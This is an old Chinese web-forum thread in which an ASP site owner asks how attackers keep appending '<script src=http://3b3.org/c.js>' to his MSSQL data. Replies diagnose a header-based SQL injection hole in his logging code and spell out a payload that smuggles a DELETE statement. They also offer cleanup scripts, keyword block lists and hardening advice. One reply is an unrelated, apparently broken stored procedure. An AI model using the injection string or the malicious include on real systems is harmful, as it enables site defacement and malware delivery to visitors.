急问关于老掉牙的SQL注入的问题, 偶遇到高手了,一般用来防止SQL注入的方法不起作用;急急急....

coollele 2009-04-02 03:48:08
网站为:www.cfaeo.cn
www.cfaeo.com
数据库为: MSSQL2005
起先是用自己的服务器,安装的WIN2003系统;其实数据量也不是很大;总被人家修改,每次在数据表字段尾部添加:<script src=http://3b3.org/c.js></script>

而后我将打开数据库连接的文件,conn.ASP文件添加了防注入的过虑;不行还是会被改;
网站提示到的;防止大小写;GET;POST等过虑我都做过了;结果不行,我怕是人家在服务器里留了木马之类的什么,怕自己对服务器安全做的不够;就将网站整个移至万网空间了;在万网上租用空间及数据库;相信人家的服务器安全一定做到最后;也不会有木马之类的东西;可是结果还是一样;可以很随意的在我的数据库后面添加那段JS代码;
现在我无语了;

特来请江湖救急

我将我的程序代码附上;请下虾们帮忙...

conn.asp
<%
Server.ScriptTimeOut=3600
dim conn,con_string
con_string = "provider=sqloledb;driver={SQL server};server=dsc-04.hichina.com;uid=******;pwd=*******;database=dsc040056_db"
set conn=server.createobject("adodb.connection")
conn.open con_string

'创建日志记录
'ip记录
if Request.ServerVariables("HTTP_X_FORWARDED_FOR")=empty then
remoteaddr=Request.ServerVariables("REMOTE_ADDR")
else
remoteaddr=Request.ServerVariables("HTTP_X_FORWARDED_FOR")
end if
sub log(message)
conn.Execute("insert into log (username,ip,windows,remark) values ('"&session("admin_name")&"','"&remoteaddr&"','"&Request.Servervariables("HTTP_USER_AGENT")&"','"&message&"')")
end sub
'***********************************************
'过程函数名:sqlcheck
'作 用:自己写一个防止SQL注入
'参 数:Str
'返回值:Str
'***********************************************

'ascii 表示
'chr(37) 过滤SQL注入%
'chr(39) 过滤SQL注入'
'chr(43) 过滤SQL注入+
'chr(60) 过滤SQL注入<
'chr(61) 过滤SQL注入>

SQL_injdata="and|exec|insert|select|delete|update|count|set|(|)|*|'|%|+|>|<|chr|mid|master|truncate|char|declare|xp_|sp_|0x|%20|chr(37)|chr(39)|chr(43)|chr(60)|chr(62)"
sql_inj=split(SQL_injdata,"|")
if request.form<>"" then
for each sql_post in request.form
for sql_date=0 to Ubound(sql_inj)
if instr(LCase(request.form(sql_post)),sql_inj(sql_date))>0 then
Response.write("<script language=javascript>alert('系统添加防止SQL注入!请不要尝试!\n"&sql_inj(sql_date)&"\n您的信息我们已录下来\n您的IP:"&Request.ServerVariables("REMOTE_ADDR")&" 时间为:"&now()&"\n请求方法为:"&Request.ServerVariables("Request_Method") &"\n端口号为:"&Request.ServerVariables("Server_Port") &"');</script>")
log("不合法字符"&sql_inj(sql_date)&" <br>请求方法为:"&Request.ServerVariables("Request_Method") &"\n端口号为:"&Request.ServerVariables("Server_Port") &"页面为<BR>"&Request.ServerVariables("script_name")&"<br>"&Request.ServerVariables("Query_String")&"<br>"&Request.form&"")

response.End
end if
next
next
end if



If Request.QueryString<>"" Then
for each sql_get in request.QueryString
For sql_date=0 To Ubound(sql_inj)
if instr(LCase(request.QueryString(sql_get)),sql_inj(sql_date))>0 then
Response.write("<script language=javascript>alert('系统添加防止SQL注入!请不要尝试!\n"&sql_inj(sql_date)&"\n您的信息我们已录下来\n您的IP:"&Request.ServerVariables("REMOTE_ADDR")&" 时间为:"&now()&"\n请求方法为:"&Request.ServerVariables("Request_Method") &"\n端口号为:"&Request.ServerVariables("Server_Port") &"');</script>")
log("不合法字符"&sql_inj(sql_date)&" <br>请求方法为:"&Request.ServerVariables("Request_Method") &"\n端口号为:"&Request.ServerVariables("Server_Port") &"页面为<BR>"&Request.ServerVariables("script_name")&"<br>"&Request.ServerVariables("Query_String")&"<br>"&Request.form&"")

response.End ()
end if
next
next
end if
%>

...全文
888 点赞 收藏 33
写回复
33 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
qq1598290008 2011-01-02
网站被SQL注入怎么办呢
参考的详细的解决办法
如果你还是解决不了,就加我朋友QQ:1164469168
回复
壮士 2010-08-18
我现在也在做防sql注入,学习了
回复
piaorou 2009-04-24
conn.Execute("insert into log (username,ip,windows,remark) values ('"&session("admin_name")&"','"&remoteaddr&"','"&Request.Servervariables("HTTP_USER_AGENT")&"','"&message&"')")

这句就存在漏洞,Request.Servervariables("HTTP_USER_AGENT")这个值是可以伪造的。如果伪造的内容包含危险内容的话,你这里连'号都没过滤。
像你这里攻击者就可以假装提交?id=1 and 1=1然后让你程序执行log函数。这个HTTP_USER_AGENT可以用nc.exe伪造。
回复
wcwtitxu 2009-04-24
不要依赖字符过滤

[Quote=引用 12 楼 jinjazz 的回复:]
过滤字符集是很愚蠢的做法,最简单的是任何sql语句使用参数而不是拼接字符串。

如果要拼接,数字型的参数在拼接钱强制转为相应数字类型,然后再转为字符串来拼接
如果是字符串参数,把字符串内的单引号全都替换为两个单引号
[/Quote]
回复
lzj34 2009-04-24
SQL_injdata="and|exec|insert|select|delete|update|count|set|(|)|*|'|%|+|>| mid|master|truncate|char|declare|xp_|sp_|0x|%20|chr(37)|chr(39)|chr(43)|chr(60)|c<|chr|hr(62)|.js|javascript
sql_inj=split(SQL_injdata,"|")
if request.form <>"" then
for each sql_post in request.form
for sql_date=0 to Ubound(sql_inj)
if instr(LCase(request.form(sql_post)),sql_inj(sql_date))>0 then
Response.write(" <script language=javascript>alert('系统添加防止SQL注入!请不要尝试!\n"& sql_inj(sql_date)&"\n您的信息我们已录下来\n您的 IP:"&Request.ServerVariables("REMOTE_ADDR")&" 时间为:"&now()&"\n请求方法为:"&Request.ServerVariables("Request_Method") &"\n端口号为:"&Request.ServerVariables("Server_Port") &"'); </script>")
log("不合法字符"&sql_inj(sql_date)&" <br>请求方法为:"&Request.ServerVariables("Request_Method") &"\n端口号为:"&Request.ServerVariables("Server_Port") &"页面为 <BR>"&Request.ServerVariables("script_name")&" <br>"&Request.ServerVariables("Query_String")&" <br>"&Request.form&"")

response.End
end if
next
next
end if


If Request.QueryString <>"" Then
for each sql_get in request.QueryString
For sql_date=0 To Ubound(sql_inj)
if instr(LCase(request.QueryString(sql_get)),sql_inj(sql_date))>0 then
Response.write(" <script language=javascript>alert('系统添加防止SQL注入!请不要尝试!\n"& sql_inj(sql_date)&"\n您的信息我们已录下来\n您的 IP:"&Request.ServerVariables("REMOTE_ADDR")&" 时间为:"&now()&"\n请求方法为:"&Request.ServerVariables("Request_Method") &"\n端口号为:"&Request.ServerVariables("Server_Port") &"'); </script>")
log("不合法字符"&sql_inj(sql_date)&" <br>请求方法为:"&Request.ServerVariables("Request_Method") &"\n端口号为:"&Request.ServerVariables("Server_Port") &"页面为 <BR>"&Request.ServerVariables("script_name")&" <br>"&Request.ServerVariables("Query_String")&" <br>"&Request.form&"")

response.End ()
end if
next
next
end if
%>
回复
redcn2004 2009-04-24
楼上的几位推荐的很全啊
回复
wangzhiliang 2009-04-24
路过,学习学习
回复
gmlwl 2009-04-24
学习一下
回复
junyi2003 2009-04-24
安全意识比较差啊。

用存储过程,还有就是所有进口都要做校验,不能只用JS做检验,后台程序端也要做。
回复
Atai-Lu 2009-04-24
[Quote=引用 24 楼 wcwtitxu 的回复:]
不要依赖字符过滤

引用 12 楼 jinjazz 的回复:
过滤字符集是很愚蠢的做法,最简单的是任何sql语句使用参数而不是拼接字符串。

如果要拼接,数字型的参数在拼接钱强制转为相应数字类型,然后再转为字符串来拼接
如果是字符串参数,把字符串内的单引号全都替换为两个单引号


[/Quote]
恩,赞同
http://blog.csdn.net/luxu001207/archive/2009/01/22/3850931.aspx
回复
yanniu008 2009-04-24
其实防止SQL注入很简单 用参数式SQL语句,不要用拼接式SQL语句,就可以防止很多注入。
回复
yanniu008 2009-04-24
前面说的SQL注入大全可以看看
我以前也发布过两个帖子你可以看看:
http://topic.csdn.net/u/20080926/09/66cafa17-06ae-4071-960b-4377d72081ce.html (上传漏洞)
http://topic.csdn.net/u/20080928/10/cb193c37-640d-47ee-8c4d-3377458191f8.html (SQL注入)
回复
基督山哥们 2009-04-24
还是你过滤的不全,现在有这两种情况,
一是:木马已在服务器里了
二是:还有漏洞

首先你要看看你数据库的权限,正如上面所说不要用sa,新建一个用户。
我给你一个防注入的

1 严格过滤 request.form 和 request.querystring 获取的内容,坚决不用 request("name") 这样的方式获取值,凡是采用 cookies 保存的内容,尽量不要用在sql语句里进行查询数据库操作;
2 重要的用户资料尽量采用 session 验证,因为session是服务器端的,客户端无法伪造数据,除非他有你服务器的权限。

http://hi.baidu.com/sjzpj520/blog/item/46ca0f7b61ee12fc0bd1872a.html
看上面的链接,绝对管用。

<%
Response.Buffer = True '缓存页面
'防范get注入
If Request.QueryString <> "" Then StopInjection(Request.QueryString)
'防范post注入
If Request.Form <> "" Then StopInjection(Request.Form)
'防范cookies注入
If Request.Cookies <> "" Then StopInjection(Request.Cookies)

'正则子函数
Function StopInjection(Values)
Dim regEx
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "'|;|#|([\s\b+()]+(select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[\s\b+]*)"
Dim sItem, sValue
For Each sItem In Values
sValue = Values(sItem)
If regEx.Test(sValue) Then
Response.Write "<Script Language=javascript>alert('非法注入!你的行为已被记录!!');history.back(-1);</Script>"
Response.End
End If
Next
Set regEx = Nothing
End function
%>


以上代码保存为一个asp文件,然后在连接数据库代码的前面<include >这个asp文件
回复
lg3605119 2009-04-22
http://topic.csdn.net/u/20081205/09/3DD06076-BCBE-45D4-998C-8999FDBE6FAE.html
回复
haitao 2009-04-02

sub log(message)
conn.Execute("insert into log (username,ip,windows,remark) values ('"&session("admin_name")&"','"&remoteaddr&"','"&Request.Servervariables("HTTP_USER_AGENT")&"','"&message&"')")
end sub

如果他把自己的浏览器HTTP_USER_AGENT改为:aaa','bbb') delete .... where 1=1 or 'a' in ('1
是不是就真能删除。。。。
回复
haitao 2009-04-02

sub log(message)
conn.Execute("insert into log (username,ip,windows,remark) values ('"&session("admin_name")&"','"&remoteaddr&"','"&Request.Servervariables("HTTP_USER_AGENT")&"','"&message&"')")
end sub

如果他把自己的浏览器HTTP_USER_AGENT改为:aaa','bbb') delete .... where 1=1 or 'a' in ('1
是不是就真能删除。。。。
回复
ai_li7758521 2009-04-02
数据库被注入攻击  所有文本型字下段数据都被加了    <script_src=http://ucmal.com/0.js> </script> 
怎么删掉?


SQL code
--sql 2000解决方法
DECLARE @fieldtype sysname
SET @fieldtype='varchar'

--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
回复
ai_li7758521 2009-04-02
如何最快速度删除? 
" <script src=http://3b3.org/c.js> </script> "
---------------------------------------------------------------
进入SQL查询分析器
选择你的数据库
第一步:先sql表修改所有者为dbo
EXEC sp_MSforeachtable 'exec sp_changeobjectowner ' '? ' ', ' 'dbo ' ' '

第二步:统一删除字段被挂的js
declare @delStr nvarchar(500)
set @delStr= ' <script src=http://3b3.org/c.js> </script> '

set nocount on

declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)

set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype= 'U '

open cur
fetch next from cur into @tableName,@tbID

while @@fetch_status=0
begin
declare cur1 cursor for
--xtype in (231,167,239,175,35) 为char,varchar,nchar,nvarchar,text类型
select name from syscolumns where xtype in (231,167,239,175,35) and id=@tbID
open cur1
fetch next from cur1 into @columnName
while @@fetch_status=0
begin
set @sql= 'update [ ' + @tableName + '] set [ '+ @columnName + ']= replace([ '+@columnName+ '], ' ' '+@delStr+ ' ' ', ' ' ' ') where [ '+@columnName+ '] like ' '% '+@delStr+ '% ' ' '
exec sp_executesql @sql
set @iRow=@@rowcount
set @iResult=@iResult+@iRow
if @iRow> 0
begin
print '表: '+@tableName+ ',列: '+@columnName+ '被更新 '+convert(varchar(10),@iRow)+ '条记录; '
end
fetch next from cur1 into @columnName


end
close cur1
deallocate cur1

fetch next from cur into @tableName,@tbID
end
print '数据库共有 '+convert(varchar(10),@iResult)+ '条记录被更新!!! '

close cur
deallocate cur
set nocount off
---------------------------------------------------------------
彻底杜绝SQL注入

1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户,并用这个用户访问数据库
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
---------------------------------------------------------------
让3b3.org c.js注入见鬼去吧!
-----------------------------------------------------------------
回复
coollele 2009-04-02
楼上这位大虾,写的这段代码是作什么用的呀;;;;???
回复
littlechildfcb 2009-04-02
set ANSI_NULLS ON
set QUOTED_IDENTIFIER ON
go

ALTER PROCEDURE [dbo].[BBS_dispbbs_new]
@skin int,@Announceid int,@replyid int,@boardid int,@currentpage int,@pagecount int,@recordcount int,@TotalUseTable varchar(10)
AS
SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED
declare @tempsql varchar(1000),@totalpage int,@residual int,@halftotal int,@newcount int
select @newcount=count(announceid) from newbbs where rootid=@Announceid and locktopic<2
if (@recordcount=@newcount) or ((@recordcount-@newcount)<=((@currentpage-1)*@pagecount))
begin
set @totalpage=@recordcount/@pagecount+1
set @residual=@recordcount%@pagecount
set @halftotal=(@recordcount-@newcount/2)/@pagecount+1
if @skin=1 and @replyid=@Announceid
else if @skin=1
else if (@newcount=0) or ((@recordcount-@newcount)>=(@currentpage*@pagecount))
begin
set @totalpage=@recordcount/@pagecount+1
set @residual=@recordcount%@pagecount
set @halftotal=(@recordcount-@newcount)/@pagecount+1
if @skin=1 and @replyid=@Announceid
set @residual=@recordcount%@pagecount
set @tempsql='Select top '+str(@pagecount)+' B.AnnounceID,B.BoardID,B.UserName,B.Topic,B.dateandtime,B.body,B.Expression,B.ip,B.RootID,B.signflag,B.isbest,B.PostUserid,B.layer,b.isagree,U.useremail,U.homepage,U.oicq,U.sign,U.class,U.title,U.width,U.height,U.article,U.face,U.addDate,U.userWealth,U.userEP,U.userCP,U.birthday,U.sex,u.UserGroup,u.LockUser,u.userPower,U.titlepic,U.UserGroupID,U.LastLogin,B.PostBuyUser,U.online,B.anony,U.masterboard,b.awardinfo,U.userclass from '+@TotalUseTable+' B left join [user] U on U.UserID=B.PostUserID where B.BoardID='+str(@BoardID)+' and B.rootID='+str(@Announceid)+' and B.locktopic<2 and B.Announceid >=(select min(Announceid) from (select top '+str(@residual)+' announceid from '+@TotalUseTable+' where BoardID='+str(@BoardID)+' and RootID='+str(@Announceid)+' and locktopic<2 order by announceid desc) temptable ) order by B.AnnounceID'
execute(@tempsql)
set @residual=(@recordcount-@newcount)%@pagecount
set @tempsql='insert into newbbs(ParentID,BoardID,UserName,PostUserID,Topic,Body,DateAndTime,length,RootID,layer,orders,isbest,ip,Expression,locktopic,signflag,emailflag,isagree,isupload,isaudit,PostBuyUser,anony,awardinfo) select ParentID,BoardID,UserName,PostUserID,Topic,Body,DateAndTime,length,RootID,layer,orders,isbest,ip,Expression,locktopic,signflag,emailflag,isagree,isupload,isaudit,PostBuyUser,anony,awardinfo from '+@TotalUseTable+' where BoardID='+str(@BoardID)+' and RootID='+str(@Announceid)+' and locktopic<2 and announceid>=(select min(Announceid) from (select top '+str(@residual)+' announceid from '+@TotalUseTable+' where BoardID='+str(@BoardID)+' and RootID='+str(@Announceid)+' and locktopic<2 order by announceid desc) temptable ) order by announceid asc'
execute(@tempsql)
set @tempsql='delete from '+@TotalUseTable+' where BoardID='+str(@BoardID)+' and RootID='+str(@Announceid)+' and locktopic<2 and announceid>=(select min(Announceid) from (select top '+str(@residual)+' announceid from '+@TotalUseTable+' where BoardID='+str(@BoardID)+' and RootID='+str(@Announceid)+' and locktopic<2 order by announceid desc) temptable )'
execute(@tempsql)

set @residual=@newcount
set @tempsql='insert into newbbs(ParentID,BoardID,UserName,PostUserID,Topic,Body,DateAndTime,length,RootID,layer,orders,isbest,ip,Expression,locktopic,signflag,emailflag,isagree,isupload,isaudit,PostBuyUser,anony,awardinfo) select ParentID,BoardID,UserName,PostUserID,Topic,Body,DateAndTime,length,RootID,layer,orders,isbest,ip,Expression,locktopic,signflag,emailflag,isagree,isupload,isaudit,PostBuyUser,anony,awardinfo from newbbs where BoardID='+str(@BoardID)+' and RootID='+str(@Announceid)+' and locktopic<2 and announceid<=(select max(Announceid) from (select top '+str(@residual)+' announceid from newbbs where BoardID='+str(@BoardID)+' and RootID='+str(@Announceid)+' and locktopic<2 order by announceid) temptable ) order by announceid asc'
execute(@tempsql)
set @tempsql='delete from newbbs where BoardID='+str(@BoardID)+' and RootID='+str(@Announceid)+' and locktopic<2 and announceid<=(select max(Announceid) from (select top '+str(@residual)+' announceid from newbbs where BoardID='+str(@BoardID)+' and RootID='+str(@Announceid)+' and locktopic<2 order by announceid) temptable )'
execute(@tempsql)
--set @tempsql='Select top '+str(@pagecount)+' B.AnnounceID,B.BoardID,B.UserName,B.Topic,B.dateandtime,B.body,B.Expression,B.ip,B.RootID,B.signflag,B.isbest,B.PostUserid,B.layer,b.isagree,U.useremail,U.homepage,U.oicq,U.sign,U.class,U.title,U.width,U.height,U.article,U.face,U.addDate,U.userWealth,U.userEP,U.userCP,U.birthday,U.sex,u.UserGroup,u.LockUser,u.userPower,U.titlepic,U.UserGroupID,U.LastLogin,B.PostBuyUser,U.online,B.anony,U.masterboard,b.awardinfo,U.userclass from newbbs B left join [user] U on U.UserID=B.PostUserID where B.BoardID='+str(@BoardID)+' and B.rootID='+str(@Announceid)+' and B.locktopic<2 order by Announceid'
--execute(@tempsql)
回复
相关推荐
发帖
ASP
创建于2007-09-28

2.8w+

社区成员

ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
申请成为版主
帖子事件
创建了帖子
2009-04-02 03:48
社区公告
暂无公告